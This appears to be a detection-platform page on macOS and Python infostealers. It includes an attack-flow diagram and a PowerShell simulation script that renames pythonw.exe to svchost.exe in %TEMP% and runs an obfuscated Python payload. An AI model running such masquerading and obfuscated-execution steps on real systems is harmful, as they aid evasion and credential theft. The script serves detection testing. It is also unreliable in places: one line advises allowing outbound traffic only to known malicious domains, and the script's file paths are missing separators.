Infostealers without borders: macOS, Python stealers, and platform abuse
Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Infostealer campaigns are no longer Windows-only: they increasingly target macOS, rely on cross-platform languages like Python, and abuse trusted platforms such as WhatsApp and PDF tools. Adversaries spread macOS stealers like DigitStealer, MacSync, and AMOS through fake DMGs and click-fix prompts, while Python stealers such as PXA Stealer arrive via phishing emails. These operations harvest credentials, cryptocurrency wallet data, and developer secrets, then exfiltrate them to attacker-controlled servers. Detection is harder due to fileless execution, signed binaries, and use of legitimate services for C2.
Investigation
Microsoft Defender researchers tracked multiple waves from late 2025 through 2026, collecting hashes, URLs, domains, and IPs tied to the activity. They documented persistence methods (registry Run keys, scheduled tasks, LaunchAgents), fileless execution via curl and AppleScript, and C2 over Telegram and other services. The write-up also provides sample KQL queries to surface suspicious endpoint and network signals.
Mitigation
Mitigations emphasize user training, blocking unsigned DMG installers, and monitoring for risky terminal chains using curl, base64, gunzip, or osascript. Enforce endpoint protections against LOLBIN abuse and restrict outbound traffic strictly to known malicious domains. Expand detections for registry Run keys, scheduled tasks, and process-injection patterns associated with stealers.
Response
When detected, isolate the endpoint, terminate malicious processes, remove persisted artifacts (registry keys, scheduled tasks), and block C2 infrastructure. Run forensics to determine what was stolen, reset compromised credentials, and notify affected users. Deploy refreshed detection rules and enable block-mode EDR to stop repeat infections.
"graph TB %% Class Definitions classDef technique fill:#99ccff classDef operator fill:#ff9900 %% Nodes tech_phishing["<b>Technique</b> – T1566: Phishing<br/><b>Description</b>: malicious email containing a link or attachment that, when opened, initiates the attack."] class tech_phishing technique tech_copy_paste["<b>Technique</b> – T1204.004: Malicious Copy and Paste<br/><b>Description</b>: user executes copied terminal commands, enabling the payload to run."] class tech_copy_paste technique tech_unix_shell["<b>Technique</b> – T1059.004: Unix Shell<br/><b>Description</b>: use of a shell pipeline (curl | base64 -d | gunzip) to retrieve and unpack the payload."] class tech_unix_shell technique tech_compression["<b>Technique</b> – T1027.015: Compression<br/><b>Description</b>: payload is delivered as base64u2011encoded and compressed data to evade detection."] class tech_compression technique tech_decode["<b>Technique</b> – T1140: Deobfuscate/Decode Files or Information<br/><b>Description</b>: script decodes the base64 data and extracts the malicious binary."] class tech_decode technique tech_launch_agent["<b>Technique</b> – T1543.001: Launch Agent<br/><b>Description</b>: creates a useru2011level LaunchAgent plist in ~/Library/LaunchAgents for persistence."] class tech_launch_agent technique tech_launch_daemon["<b>Technique</b> – T1543.004: Launch Daemon<br/><b>Description</b>: installs a system LaunchDaemon to achieve persistence with higher privileges."] class tech_launch_daemon technique tech_archive["<b>Technique</b> – T1560.001: Archive Collected Data via Utility<br/><b>Description</b>: data is zipped in /tmp before exfiltration."] class tech_archive technique tech_telegram["<b>Technique</b> – T1102: Exfiltration Over Web Service (Telegram)<br/><b>Description</b>: zip file is sent to a remote Telegram bot via the Telegram API."] class tech_telegram technique tech_file_deletion["<b>Technique</b> – T1070.004: File Deletion<br/><b>Description</b>: removes the zip archive, plist and temporary files to hide artifacts."] class tech_file_deletion technique %% Connections tech_phishing –>|leads_to| tech_copy_paste tech_copy_paste –>|leads_to| tech_unix_shell tech_unix_shell –>|includes| tech_compression tech_unix_shell –>|includes| tech_decode tech_unix_shell –>|creates| tech_launch_agent tech_unix_shell –>|creates| tech_launch_daemon tech_unix_shell –>|triggers| tech_archive tech_archive –>|used_for| tech_telegram tech_telegram –>|followed_by| tech_file_deletion "
Attack Flow
Detections
LOLBAS WScript / CScript (via process_creation)
View
System Processes Execution from Untypical Paths (via process_creation)
View
Suspicious Curl Execution Attempt [MacOS] (via cmdline)
View
Suspicious Execution from Public User Profile (via process_creation)
View
Archive Was Created In MacOS Temporary Folder (via file_event)
View
IOCs (SourceIP) to detect: Infostealers without borders: macOS, Python stealers, and platform abuse
View
IOCs (HashSha256) to detect: Infostealers without borders: macOS, Python stealers, and platform abuse
View
IOCs (DestinationIP) to detect: Infostealers without borders: macOS, Python stealers, and platform abuse
View
Detection of Renamed Python Interpreter Executing Obfuscated Scripts [Windows Process Creation]
View
Detection of Encoded PowerShell Commands for Payload Download [Windows Powershell]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
An attacker with local admin rights prepares a malicious payload. First, they copy the legitimatepythonw.exeto a new file namedsvchost.exein a user‑writable directory (e.g.,%TEMP%). They then embed an obfuscated Python script that exfiltrates credentials. Finally, they execute the renamed interpreter, which generates a process‑creation event where the process name issvchost.exebut the version‑info still reportspythonw.exe. This exact pattern matches the Sigma rule. -
Regression Test Script:
#---------------------------------------------- # Stage 1 – Prepare malicious svchost.exe copy #---------------------------------------------- $tempDir = "$env:TEMPmalicious" New-Item -ItemType Directory -Path $tempDir -Force | Out-Null $src = "$env:ProgramFilesPython311pythonw.exe" # adjust path to existing pythonw.exe $dst = "$tempDirsvchost.exe" Copy-Item -Path $src -Destination $dst -Force #---------------------------------------------- # Stage 2 – Create obfuscated Python payload #---------------------------------------------- $payload = @" import base64, subprocess, sys cmd = base64.b64decode('cHV0cyAtcGFzc3dvcmQgZXhhbXBsZQ==').decode() subprocess.run(cmd, shell=True) "@ $payloadPath = "$tempDirpayload.py" $payload | Set-Content -Path $payloadPath -Encoding UTF8 #---------------------------------------------- # Stage 3 – Execute malicious svchost.exe (pythonw) #---------------------------------------------- Start-Process -FilePath $dst -ArgumentList "`"$payloadPath`"" #---------------------------------------------- # Stage 4 – Optional: wait for detection ingestion #---------------------------------------------- Start-Sleep -Seconds 10 -
Cleanup Commands:
# Remove malicious artifacts Remove-Item -Path "$env:TEMPmalicious" -Recurse -Force